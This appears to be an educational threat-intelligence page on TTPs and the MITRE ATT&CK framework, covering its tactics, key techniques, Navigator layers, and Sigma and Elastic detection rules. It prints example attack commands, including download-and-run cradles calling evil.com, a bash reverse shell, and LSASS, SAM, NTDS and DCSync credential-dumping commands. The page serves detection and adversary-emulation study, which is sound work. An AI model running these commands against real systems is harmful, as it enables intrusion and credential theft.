TTPs & MITRE ATT&CK

Intelligence

Tactics, Techniques, and Procedures (TTPs) describe how adversaries operate. The MITRE ATT&CK framework provides a comprehensive knowledge base for understanding and categorizing adversary behavior.

Why TTPs Matter

While IOCs like IP addresses and file hashes change frequently, TTPs represent the underlying behaviors that are harder for adversaries to modify. Detection based on TTPs provides more durable defensive value.

MITRE ATT&CK Overview

ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a globally-accessible knowledge base that documents real-world adversary behaviors. It's organized into:

Tactics

The "why" - adversary's tactical objectives (e.g., Initial Access, Persistence)

Techniques

The "how" - methods used to achieve objectives (e.g., Phishing, Valid Accounts)

Sub-Techniques

Specific variations of techniques (e.g., Spearphishing Attachment)

ATT&CK Tactics (Enterprise)

The 14 tactics represent the adversary's goals throughout the attack lifecycle:

TA0043: Reconnaissance

Gathering information to plan future operations

10 Techniques

Examples: Active Scanning, Search Open Websites/Domains, Gather Victim Identity Info

TA0042: Resource Development

Establishing resources to support operations

8 Techniques

Examples: Acquire Infrastructure, Develop Capabilities, Establish Accounts

TA0001: Initial Access

Gaining initial foothold in the network

9 Techniques

Examples: Phishing, Exploit Public-Facing Application, Valid Accounts

TA0002: Execution

Running attacker-controlled code

14 Techniques

Examples: Command and Scripting Interpreter, User Execution, Windows Management Instrumentation

TA0003: Persistence

Maintaining access across restarts and credential changes

19 Techniques

Examples: Boot or Logon Autostart, Scheduled Task/Job, Account Manipulation

TA0004: Privilege Escalation

Gaining higher-level permissions

13 Techniques

Examples: Exploitation for Privilege Escalation, Valid Accounts, Access Token Manipulation

TA0005: Defense Evasion

Avoiding detection throughout the attack

42 Techniques

Examples: Obfuscated Files, Indicator Removal, Masquerading, Process Injection

TA0006: Credential Access

Stealing credentials like account names and passwords

17 Techniques

Examples: OS Credential Dumping, Brute Force, Unsecured Credentials, Input Capture

TA0007: Discovery

Understanding the environment and what can be controlled

31 Techniques

Examples: Account Discovery, System Information Discovery, Network Service Discovery

TA0008: Lateral Movement

Moving through the environment to reach targets

9 Techniques

Examples: Remote Services, Lateral Tool Transfer, Use Alternate Authentication Material

TA0009: Collection

Gathering data of interest to the adversary's goals

17 Techniques

Examples: Data from Local System, Screen Capture, Email Collection, Archive Collected Data

TA0011: Command and Control

Communicating with compromised systems

16 Techniques

Examples: Application Layer Protocol, Encrypted Channel, Proxy, Web Service

TA0010: Exfiltration

Stealing data from the network

9 Techniques

Examples: Exfiltration Over C2 Channel, Exfiltration Over Web Service, Automated Exfiltration

TA0040: Impact

Manipulating, interrupting, or destroying systems and data

14 Techniques

Examples: Data Destruction, Data Encrypted for Impact, Defacement, Service Stop

Key Techniques Deep Dive

T1566: Phishing

One of the most common initial access techniques. Adversaries send messages with malicious attachments or links to gain access to victim systems.

T1566.001

Spearphishing Attachment

Malicious files sent via email (Office docs, PDFs, executables)

T1566.002

Spearphishing Link

Links to credential harvesting pages or drive-by downloads

T1566.003

Spearphishing via Service

Phishing through social media, messaging apps, or collaboration tools

T1059: Command and Scripting Interpreter

Adversaries abuse command-line interpreters and scripting languages to execute commands, scripts, or binaries.

bash 
# T1059.001 - PowerShell
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

# T1059.003 - Windows Command Shell
cmd.exe /c "certutil -urlcache -split -f http://evil.com/malware.exe C:\Windows\Temp\malware.exe && C:\Windows\Temp\malware.exe"

# T1059.004 - Unix Shell
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

# T1059.005 - Visual Basic
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ep bypass -c IEX(malware)"",0:close")

T1003: OS Credential Dumping

Extracting credentials from the operating system to enable lateral movement and privilege escalation.

T1003.001: LSASS Memory

powershell 
# Mimikatz
sekurlsa::logonpasswords

# Procdump
procdump.exe -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] dump.bin full

T1003.002: SAM Database

powershell 
# Registry dump
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive

# Secretsdump
secretsdump.py -sam sam.hive -system system.hive LOCAL

T1003.003: NTDS.dit

powershell 
# Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit

# Secretsdump
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

T1003.006: DCSync

powershell 
# Mimikatz
lsadump::dcsync /domain:corp.local /user:administrator

# Impacket
secretsdump.py corp.local/admin:password@dc01.corp.local -just-dc-user administrator

T1055: Process Injection

Injecting code into the address space of another process to evade detection and gain elevated privileges.

Common Injection Types

  • • T1055.001: DLL Injection
  • • T1055.002: Portable Executable Injection
  • • T1055.003: Thread Execution Hijacking
  • • T1055.004: Asynchronous Procedure Call
  • • T1055.012: Process Hollowing

Detection Focus

  • • CreateRemoteThread API calls
  • • WriteProcessMemory operations
  • • Unusual parent-child process relationships
  • • Memory regions with RWX permissions

Using ATT&CK Navigator

The ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices.

json 
# Create a layer file for a threat actor's TTPs
# Example: APT29 layer (simplified)
{
  "name": "APT29 TTPs",
  "versions": {
    "attack": "14",
    "navigator": "4.9.1"
  },
  "domain": "enterprise-attack",
  "description": "APT29 techniques from MITRE ATT&CK",
  "techniques": [
    {"techniqueID": "T1566.001", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1059.001", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1078", "score": 1, "color": "#ff6666"},
    {"techniqueID": "T1195.002", "score": 1, "color": "#ff0000"},
    {"techniqueID": "T1003.003", "score": 1, "color": "#ff6666"}
  ]
}

Query ATT&CK with Python

python 
from mitreattack.stix20 import MitreAttackData

# Initialize ATT&CK data
mitre_attack = MitreAttackData("enterprise-attack.json")

# Get all techniques for a specific tactic
initial_access = mitre_attack.get_techniques_by_tactic("initial-access", "enterprise-attack")
for tech in initial_access:
    print(f"{tech.external_references[0].external_id}: {tech.name}")

# Get techniques used by a specific group
apt29_techniques = mitre_attack.get_techniques_used_by_group("intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542")
for tech in apt29_techniques:
    print(f"{tech['technique'].name}")

# Get mitigations for a technique
mitigations = mitre_attack.get_mitigations_mitigating_technique("attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b")
for m in mitigations:
    print(f"{m['mitigation'].name}: {m['mitigation'].description}")

Detection & Hunting by TTP

Map detection rules to specific ATT&CK techniques for coverage analysis:

yaml 
# Sigma rule with ATT&CK tagging
title: Suspicious PowerShell Download Cradle
status: experimental
description: Detects PowerShell download cradle techniques
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'IEX'
            - 'Net.WebClient'
    condition: selection
tags:
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1105
level: high
json 
# Elastic detection rule example
{
  "name": "LSASS Memory Access",
  "rule_id": "uuid-here",
  "risk_score": 73,
  "severity": "high",
  "threat": [
    {
      "framework": "MITRE ATT&CK",
      "tactic": {
        "id": "TA0006",
        "name": "Credential Access",
        "reference": "https://attack.mitre.org/tactics/TA0006/"
      },
      "technique": [
        {
          "id": "T1003",
          "name": "OS Credential Dumping",
          "reference": "https://attack.mitre.org/techniques/T1003/",
          "subtechnique": [
            {
              "id": "T1003.001",
              "name": "LSASS Memory",
              "reference": "https://attack.mitre.org/techniques/T1003/001/"
            }
          ]
        }
      ]
    }
  ],
  "query": "process where event.type == \"start\" and process.name : \"lsass.exe\""
}

Coverage Gap Analysis

Use ATT&CK Navigator to visualize your detection coverage. Create layers showing which techniques you can detect, then overlay threat actor TTPs to identify gaps. Prioritize detection development for techniques commonly used by adversaries targeting your industry.

Adversary Emulation with TTPs

Use documented TTPs to create realistic attack simulations:

powershell 
# Atomic Red Team - Test specific techniques
# https://github.com/redcanaryco/atomic-red-team

# Install Invoke-AtomicRedTeam
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)

# List tests for a technique
Invoke-AtomicTest T1003.001 -ShowDetailsBrief

# Execute a specific test
Invoke-AtomicTest T1003.001 -TestNumbers 1

# Execute all tests for a technique
Invoke-AtomicTest T1059.001

# Cleanup after testing
Invoke-AtomicTest T1003.001 -Cleanup

Related Topics

Threat Actors

IOC Analysis

Threat Modeling

Post-Exploitation